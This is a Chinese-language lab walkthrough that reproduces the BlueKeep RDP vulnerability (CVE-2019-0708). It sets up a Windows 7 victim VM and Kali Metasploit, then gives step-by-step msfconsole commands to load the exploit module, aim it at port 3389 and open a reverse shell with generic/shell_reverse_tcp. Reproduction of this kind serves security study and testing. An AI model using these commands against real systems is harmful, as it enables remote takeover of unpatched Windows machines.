本文作者:Leafer(贝塔安全实验室-核心成员)
0708千呼万唤始出来,又将是一片腥风血雨
0x01:CVE-2019-0708的危害性
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp * 系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的 。
0x02:复现环境
首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。
(一) win7环境搭建
在VMware 14中安装windows7 SP1版本模拟受害机,在这里用的是清水表哥提供的系统。
Windows7 SP1下载链接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
在VM14中安装完SP1后会是win7家庭版,需要使用升级。
在升级完之后就是win7旗舰版
接下来进入控制面板的所有控制面板项中的系统,点击远程设置。在远程设置中勾选允许运行任意版本即可。
在VMware 15中安装win7旗舰版时,可以直接在安装出选择。
(二) KALI环境搭建
首先要将MSF更新到最新版本,在最新版本中才会包括0708的利用模块。
默认使用kali官方源来更新
apt-get update
apt-get install metasploit-framework
如果觉得官方源慢可以更换其他源
用leafpad打开sources.list,把其他源加入进去。
leafpad /etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云kali更新源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#163 DEBIAN源
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian wheezy main non-free contrib
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib
下载Reference中的攻击模块放入msf的相应文件夹中(如果已存在同名文件,直接覆盖即可。如没有则自己创建)
模块下载地址
链接:https://pan.baidu.com/s/1vIlYYn9RlJ0KUMTzFhMsVQ 提取码:ax18
里面有四个攻击模块
将攻击模块一一放入放入如下路径中
rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.db
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
3.使用攻击命令
使用msfconsole命令进入metasploit-framework框架
进入以后使用reload_all重新加载0708rdp利用模块
search查看是否加载成功
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
使用info可以查看工具相关信息以及设置
可以看到我们需要设置的选项主要为RHOSTS \ RPORT \ target
使用set RHOSTS 设置靶机IP</small>
使用set RPORT 设置靶机PORT
使用set target ID数字(可选为1-4)每种都代表了机器架构
在我的复现环境中使用target 3即可,如若不行尝试使用1,2,4
目标靶机的IP为192.168.100.248
接下来设置如下参数:
目标IP:set RHOSTS 192.168.100.248</small>
目标端口: set RPORT 3389
架构id: set target 3
载入playload: set payload generic/shell_reverse_tcp
设置完参数之后,使用run开启攻击。
可以看到反弹成功了,ip为目标机IP
使用background将这个会话挂起在后台运行
这种情况也代表成功了,使用sessions 6即可进入此会话
1) 配置完参数后也无法打成功
解决方法:1.多尝试几次
2)出现Set ForceExploit错误
解决方法:1.靶机IP无法访问,关闭防火墙 2.开启3389端口
3) 每次攻击都导致蓝屏
解决方法:1.尝试更换target id 2.查看对应系统版本是否正确
4) 模块加载不成功
解决方法:1.文件自身有问题 2.使用cp命令复制,同文件名没有覆盖 3.文件自定义命名方式错误
0x03 参考链接
win7开启远程桌面:
https://jingyan.baidu.com/article/63f23628177e6d0209ab3d60.html
kali 更新msf:
https://www.cnblogs.com/zuoxiaolongzzz/p/8927173.html
CVE-2019-0708远程桌面代码执行漏洞复现:
https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961?from=groupmessage
添加CVE-2019-0708:
https://github.com/rapid7/metasploit-framework/pull/12283/files